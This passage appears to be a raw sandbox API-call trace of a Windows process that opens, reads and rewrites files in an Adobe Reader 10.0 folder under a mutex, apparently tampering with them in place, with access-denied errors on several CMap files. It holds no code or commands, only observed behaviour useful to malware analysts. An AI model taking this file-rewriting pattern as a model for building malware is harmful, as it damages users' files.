dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xe1 [0092.666] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0092.666] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.666] ReleaseMutex (hMutex=0x168) returned 1 [0092.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="server_ok.gif", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="server_ok.gif", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="server_ok.gif", lpUsedDefaultChar=0x0) returned 13 [0092.666] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ee7a38, nNumberOfBytesToRead=0xe1, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee7a38*, lpNumberOfBytesRead=0x359f2bc*=0xe1, lpOverlapped=0x0) returned 1 [0092.667] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0092.668] WriteFile (in: hFile=0x1d4, lpBuffer=0x2691bd8*, nNumberOfBytesToWrite=0x669, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2691bd8*, lpNumberOfBytesWritten=0x359f2d0*=0x669, lpOverlapped=0x0) returned 1 [0092.668] CloseHandle (hObject=0x1d4) returned 1 [0092.668] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\turnOnNotificationInAcrobat.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\turnonnotificationinacrobat.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0092.669] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0092.669] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x33f [0092.669] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0092.669] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.669] ReleaseMutex (hMutex=0x168) returned 1 [0092.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="turnOnNotificationInAcrobat.gif", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0092.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="turnOnNotificationInAcrobat.gif", cchWideChar=31, lpMultiByteStr=0x1f8fedc, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="turnOnNotificationInAcrobat.gif", lpUsedDefaultChar=0x0) returned 31 [0092.669] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea68a8, nNumberOfBytesToRead=0x33f, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea68a8*, lpNumberOfBytesRead=0x359f2bc*=0x33f, lpOverlapped=0x0) returned 1 [0095.690] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0095.690] WriteFile (in: hFile=0x1d4, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x8c7, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x359f2d0*=0x8c7, lpOverlapped=0x0) returned 1 [0095.691] CloseHandle (hObject=0x1d4) returned 1 [0095.691] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeHRV.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmehrv.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0096.331] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0096.331] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x42aa [0096.331] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0096.331] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.331] ReleaseMutex (hMutex=0x168) returned 1 [0096.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadMeHRV.htm", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadMeHRV.htm", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadMeHRV.htm", lpUsedDefaultChar=0x0) returned 13 [0096.331] ReadFile (in: hFile=0x1f8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0096.378] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x32aa [0096.378] ReadFile (in: hFile=0x1f8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0096.381] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x32aa [0096.382] WriteFile (in: hFile=0x1f8, lpBuffer=0x26956e8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x26956e8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0096.382] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0096.382] WriteFile (in: hFile=0x1f8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0096.382] CloseHandle (hObject=0x1f8) returned 1 [0096.382] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmeukr.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0096.383] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0096.383] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x4995 [0096.384] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0096.384] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.384] ReleaseMutex (hMutex=0x168) returned 1 [0096.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadMeUKR.htm", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadMeUKR.htm", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadMeUKR.htm", lpUsedDefaultChar=0x0) returned 13 [0096.384] ReadFile (in: hFile=0x1f8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0096.391] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x3995 [0096.392] ReadFile (in: hFile=0x1f8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0096.403] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x3995 [0096.404] WriteFile (in: hFile=0x1f8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0096.404] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0096.404] WriteFile (in: hFile=0x1f8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0096.404] CloseHandle (hObject=0x1f8) returned 1 [0096.404] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\KozMinPr6N-Regular.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\kozminpr6n-regular.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0096.405] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0096.405] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x7c205c [0096.405] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0096.405] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.405] ReleaseMutex (hMutex=0x168) returned 1 [0096.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KozMinPr6N-Regular.otf", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0096.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KozMinPr6N-Regular.otf", cchWideChar=22, lpMultiByteStr=0x1f88b2c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KozMinPr6N-Regular.otf", lpUsedDefaultChar=0x0) returned 22 [0096.406] ReadFile (in: hFile=0x1f8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0096.415] ReadFile (in: hFile=0x1f8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0096.423] ReadFile (in: hFile=0x1f8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0096.427] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x7c005c [0096.427] ReadFile (in: hFile=0x1f8, lpBuffer=0x26956e8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x26956e8*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0096.429] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x7c005c [0096.431] WriteFile (in: hFile=0x1f8, lpBuffer=0x26956e8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x26956e8*, lpNumberOfBytesWritten=0x359f28c*=0x2588, lpOverlapped=0x0) returned 1 [0096.431] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0096.431] WriteFile (in: hFile=0x1f8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0096.431] WriteFile (in: hFile=0x1f8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0096.432] WriteFile (in: hFile=0x1f8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0x2000, lpOverlapped=0x0) returned 1 [0096.432] CloseHandle (hObject=0x1f8) returned 1 [0096.432] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90pv-RKSJ-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90pv-rksj-ucs2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.433] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90pv-RKSJ-UCS2", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90pv-RKSJ-UCS2", lpFilePart=0x359f690*="90pv-RKSJ-UCS2") returned 0x45 [0096.433] GetLastError () returned 0x5 [0096.433] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪀǷ\x01") returned 0x13 [0096.433] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.433] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.433] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0096.433] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.434] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.434] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90pv-RKSJ-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90pv-rksj-ucs2")) returned 0x20 [0096.434] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-4" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.434] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-4", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-4", lpFilePart=0x359f690*="Adobe-CNS1-4") returned 0x43 [0096.434] GetLastError () returned 0x5 [0096.434] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪀǷ\x01") returned 0x13 [0096.435] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.435] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.435] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0096.435] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.435] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.435] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-4" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-4")) returned 0x20 [0096.436] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-0" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.436] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-0", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-0", lpFilePart=0x359f690*="Adobe-GB1-0") returned 0x42 [0096.436] GetLastError () returned 0x5 [0096.436] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪀǷ\x01") returned 0x13 [0096.436] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.436] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.436] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0096.436] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.437] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.437] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-0" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-0")) returned 0x20 [0096.437] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-H-CID" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-h-cid"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.438] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-H-CID", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-H-CID", lpFilePart=0x359f690*="Adobe-GB1-H-CID") returned 0x46 [0096.438] GetLastError () returned 0x5 [0096.438] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪀǷ\x01") returned 0x13 [0096.438] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.438] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.438] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0096.438] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.438] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.438] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-H-CID" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-h-cid")) returned 0x20 [0096.439] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-4" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.439] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-4", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-4", lpFilePart=0x359f690*="Adobe-Japan1-4") returned 0x45 [0096.439] GetLastError () returned 0x5 [0096.439] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪀǷ\x01") returned 0x13 [0096.439] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.439] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.439] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0096.440] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.440] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.440] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-4" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-4")) returned 0x20 [0096.440] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-ucs2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.440] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-UCS2", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-UCS2", lpFilePart=0x359f690*="Adobe-Japan1-UCS2") returned 0x48 [0096.441] GetLastError () returned 0x5 [0096.441] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪀǷ\x01") returned 0x13 [0096.441] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.441] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.441] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0096.441] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.441] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0096.441] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 